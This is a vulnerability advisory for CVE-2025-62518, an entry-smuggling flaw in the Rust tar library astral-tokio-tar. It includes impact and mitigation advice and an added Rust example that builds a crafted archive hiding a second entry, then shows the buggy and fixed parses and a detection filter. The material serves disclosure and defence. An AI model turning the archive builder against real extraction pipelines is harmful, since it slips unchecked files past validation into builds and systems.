
CVE-2025-62518: CWE-843: Access of Resource Using Incompatible Type ('Type Confusion') in astral-sh tokio-tar

Severity: High
Tags: vulnerability, CVE-2025-62518, CWE-843
Published: Tue Oct 21 2025 (10/21/2025, 16:13:02 UTC)
Source: CVE Database V5
Vendor/Project: astral-sh
Product: tokio-tar

Description

astral-tokio-tar is a tar archive reading/writing library for async Rust. Versions of astral-tokio-tar prior to 0.5.6 contain a boundary parsing vulnerability that allows attackers to smuggle additional archive entries by exploiting inconsistent PAX/ustar header handling. When processing archives with PAX-extended headers containing size overrides, the parser incorrectly advances stream position based on ustar header size (often zero) instead of the PAX-specified size, causing it to interpret file content as legitimate tar headers. This issue has been patched in version 0.5.6. There are no workarounds.

AI-Powered Analysis

Last updated: 10/21/2025, 16:28:33 UTC

Technical Analysis

CVE-2025-62518 is a stream-boundary parsing flaw in astral-tokio-tar, the async Rust tar archive reading and writing library maintained by astral-sh, filed under CWE-843 (type confusion) because the parser ends up treating file content as a tar header. A tar stream is a sequence of 512-byte header blocks, each followed by the entry's data padded to a 512-byte boundary. A PAX extended header (typeflag 'x') precedes an entry's ustar header and can carry a `size` record that overrides the 12-byte octal size field in the ustar header, which is how PAX archives represent files too large for that field. Versions prior to 0.5.6 report the entry's size from the PAX record but advance the stream position by the ustar size field, which an attacker can set to zero. The next block the parser reads is then the first block of the entry's own data, and if that block is a well-formed ustar header the parser yields it as an additional entry that a correct walk of the archive never produces. The practical consequence is a desync between components: a scanner or policy check that walks the archive correctly sees one list of entries, while astral-tokio-tar extracts a different one, so name, path or content checks applied before extraction can be bypassed, and the smuggled entries are written out like any other. Whether that escalates to code execution depends on what the consumer does with the extracted tree. Exploitation needs no privileges but does require the crafted archive to be processed, which CVSS counts as user interaction; the page lists a CVSS 3.1 base score of 8.1 (High), reflecting the high confidentiality and integrity impact when the library handles untrusted archives. No exploits are known in the wild at the time of this analysis. The issue is fixed in 0.5.6 and the advisory lists no workarounds.

Potential Impact

For European organizations the impact of CVE-2025-62518 depends on where astral-tokio-tar sits in the processing path: the library is used by Rust tooling to unpack archives it did not create, and wherever such tooling extracts attacker-supplied tar files a crafted archive can introduce entries that a correct parser, and therefore any check run with one beforehand, never saw. That undermines the integrity of whatever is built from the extracted tree. The effect is most serious in automated pipelines and CI/CD systems, where a smuggled file is extracted without anyone looking at it and can become a supply-chain compromise rather than a one-off incident, and where the same archive may feed many downstream builds. Confidentiality is affected indirectly: a file written into a location the consumer later serves, imports or executes can expose data, which in finance, healthcare and government also raises GDPR obligations if personal data is altered or disclosed. No authentication is required and a malicious archive costs nothing to craft, so organizations that accept tar archives at volume, such as cloud service providers, software vendors and research institutions, carry the most exposure.

Mitigation Recommendations

The primary mitigation is to upgrade every instance of astral-tokio-tar to version 0.5.6 or later. Inventory Rust dependencies to find direct and transitive uses (for example with `cargo tree` in each workspace, or by searching Cargo.lock for the crate), since the vulnerable crate may be present only as a dependency of another tool and never appear in a project's own Cargo.toml. The advisory lists no workarounds, so where an upgrade cannot be applied immediately, reduce exposure instead: do not validate an archive with one parser and extract it with another, because the bug is precisely a disagreement between parsers; treat the entry list produced by the vulnerable version as untrusted and re-check every extracted path against the destination directory after extraction rather than before; and extract untrusted archives in a sandbox into a dedicated, empty destination. Archives in which a PAX `size` record disagrees with the ustar size field are the only input shape that triggers the flaw, and such overrides are only needed for entries of 8 GiB or more, so rejecting them up front is a reasonable interim filter where inputs are known to be small. Log and alert on archives rejected by such checks and on extractions whose resulting entry count differs from a pre-extraction listing. Finally, brief development and DevOps teams on the risk of extracting untrusted archives, and watch vendor advisories and threat-intelligence feeds for exploitation reports.
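To make the stepping error described in the Technical Analysis concrete, and to show the interim pre-filter suggested in the mitigation text, here is a self-contained Rust example added for this page. It is not code from astral-tokio-tar or astral-sh: it builds a minimal tar stream in memory (the entry names `victim.txt` and `smuggled.sh`, the `./PaxHeaders/` naming and the payload are all constructed for illustration), walks it once the way the advisory describes pre-0.5.6 behaviour (advancing by the ustar size field) and once correctly (advancing by the PAX-declared size), and flags the PAX/ustar size disagreement. The header layout and PAX record format follow the ustar/PAX specifications; the function names are this example's own.

```rust
// Added example for this page (not astral-tokio-tar code); standard library only.
const BLOCK: usize = 512;
/// Write an ASCII-octal, NUL-terminated ustar numeric field.
fn octal_field(buf: &mut [u8], value: u64) {
    let s = format!("{:0width$o}", value, width = buf.len() - 1);
    buf[..s.len()].copy_from_slice(s.as_bytes());
    buf[buf.len() - 1] = 0;
}

/// Build a 512-byte ustar header with a valid checksum; mode/uid/gid/mtime stay NUL (read as 0).
fn ustar_header(name: &str, typeflag: u8, size: u64) -> [u8; BLOCK] {
    let mut h = [0u8; BLOCK];
    h[..name.len()].copy_from_slice(name.as_bytes());
    octal_field(&mut h[124..136], size); // 11 octal digits: the field tops out just below 8 GiB
    h[156] = typeflag;
    h[257..265].copy_from_slice(b"ustar\x0000"); // magic "ustar\0" + version "00"
    h[148..156].copy_from_slice(b"        "); // checksum is summed with its own field as spaces
    let sum: u32 = h.iter().map(|&b| b as u32).sum();
    h[148..156].copy_from_slice(format!("{:06o}\0 ", sum).as_bytes());
    h
}

fn pad(len: usize) -> usize { (BLOCK - len % BLOCK) % BLOCK }
fn push_data(out: &mut Vec<u8>, data: &[u8]) {
    out.extend_from_slice(data);
    out.resize(out.len() + pad(data.len()), 0); // data is always zero-padded to a 512 boundary
}

/// PAX record "<len> <key>=<value>\n", where <len> counts the whole record, itself included.
fn pax_record(key: &str, value: &str) -> Vec<u8> {
    let body = 1 + key.len() + 1 + value.len() + 1;
    let mut total = body + 1;
    while total.to_string().len() + body != total { total = total.to_string().len() + body; }
    format!("{} {}={}\n", total, key, value).into_bytes()
}

fn parse_octal(field: &[u8]) -> u64 {
    let s: String = field.iter().take_while(|&&b| b != 0 && b != b' ').map(|&b| b as char).collect();
    u64::from_str_radix(&s, 8).unwrap_or(0)
}

fn parse_pax_size(data: &[u8]) -> Option<u64> {
    let records = std::str::from_utf8(data).ok()?.lines();
    records.filter_map(|l| l.split_once(' ')?.1.split_once('=')).find(|(k, _)| *k == "size")?.1.parse().ok()
}

#[derive(Debug, PartialEq)]
pub struct Entry { pub name: String, pub ustar_size: u64, pub pax_size: Option<u64> }
/// Walk the header chain. `advance_by_pax_size == false` reproduces the pre-0.5.6 desync:
/// the entry's size comes from the PAX record, but the stream is advanced by the ustar field.
pub fn list_entries(archive: &[u8], advance_by_pax_size: bool) -> Vec<Entry> {
    let (mut entries, mut pos, mut pending_pax) = (Vec::new(), 0usize, None::<u64>);
    while pos + BLOCK <= archive.len() {
        let hdr = &archive[pos..pos + BLOCK];
        if hdr.iter().all(|&b| b == 0) { break; } // end-of-archive marker
        let name = String::from_utf8_lossy(&hdr[..100]).trim_end_matches('\0').to_string();
        let ustar_size = parse_octal(&hdr[124..136]) as usize;
        pos += BLOCK;
        if hdr[156] == b'x' { // PAX extended header: its records apply to the next entry
            pending_pax = parse_pax_size(&archive[pos..(pos + ustar_size).min(archive.len())]);
            pos += ustar_size + pad(ustar_size);
            continue;
        }
        let pax_size = pending_pax.take();
        let size = pax_size.unwrap_or(ustar_size as u64) as usize; // what a consumer reports
        let step = if advance_by_pax_size { size } else { ustar_size };
        entries.push(Entry { name, ustar_size: ustar_size as u64, pax_size });
        pos += step + pad(step);
    }
    entries
}

/// Interim pre-filter from the mitigation text (this page's suggestion, not the advisory's):
/// a PAX size record that disagrees with the ustar field is the triggering input shape.
/// Caveat: entries of 8 GiB or more legitimately need such an override.
pub fn has_pax_size_mismatch(archive: &[u8]) -> bool {
    list_entries(archive, true).iter().any(|e| e.pax_size.map_or(false, |p| p != e.ustar_size))
}

/// Constructed sample: victim.txt's data is itself a complete header + data for smuggled.sh.
pub fn build_smuggling_archive() -> Vec<u8> {
    let payload = b"echo smuggled\n";
    let mut hidden = Vec::new();
    hidden.extend_from_slice(&ustar_header("smuggled.sh", b'0', payload.len() as u64));
    push_data(&mut hidden, payload); // hidden is now exactly 1024 bytes
    let pax = pax_record("size", &hidden.len().to_string());
    let mut out = Vec::new();
    out.extend_from_slice(&ustar_header("./PaxHeaders/victim.txt", b'x', pax.len() as u64));
    push_data(&mut out, &pax);
    out.extend_from_slice(&ustar_header("victim.txt", b'0', 0)); // ustar says 0, PAX says 1024
    push_data(&mut out, &hidden);
    out.extend_from_slice(&[0u8; 2 * BLOCK]);
    out
}

fn main() {
    let a = build_smuggling_archive();
    println!("pre-0.5.6 walk: {:?}\nfixed walk: {:?}\npre-filter rejects: {}",
             list_entries(&a, false), list_entries(&a, true), has_pax_size_mismatch(&a));
}
```

Compiled with `rustc`, the pre-0.5.6 walk lists two entries (victim.txt with size 1024, then smuggled.sh with size 14) while the correct walk lists only victim.txt; the second entry is the header hidden inside victim.txt's data, and the pre-filter rejects the archive because the PAX size (1024) disagrees with the ustar size (0). The walker deliberately stays small: it does not verify checksums and does not handle base-256 sizes, GNU long names or sparse entries, since only the stepping rule matters for this bug.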


Technical Details

Data Version: 5.1
Assigner Short Name: GitHub_M
Date Reserved: 2025-10-15T15:03:28.134Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 68f7b4a07853ccdda86f81b9

Added to database: 10/21/2025, 4:28:16 PM

Last enriched: 10/21/2025, 4:28:33 PM

Last updated: 10/23/2025, 12:20:06 AM
